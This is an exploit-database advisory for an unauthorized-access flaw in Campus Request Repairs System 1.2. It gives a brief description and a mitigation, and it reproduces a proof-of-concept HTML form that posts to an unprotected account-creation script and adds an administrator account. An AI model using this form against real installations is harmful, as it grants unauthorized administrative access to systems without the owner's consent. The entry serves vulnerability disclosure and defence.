header-logo
Suggest Exploit
vendor:
Campus Request Repairs System
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
287
CWE
Product Name: Campus Request Repairs System
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Campus Request Repairs System Unauthorized Access Vulnerability

The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts. An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.

Mitigation:

Ensure that access to administrative scripts is limited to authorized personnel only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29376/info

The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts.

An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.

The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable. 

<form action="http://www.example.com/repair/pwd/sentout.asp" method="post"> user: <input type="text" name="pID" value="adm2"><br> pass: <input type="text" name="Pwd" value="123456"> <input type="hidden" name="pFrom" value="N/A"> <input type="hidden" name="pName" value="N/A"> <input type="hidden" name="pTag" value="z,repair,leader"> <input type="submit" value="add"> </form>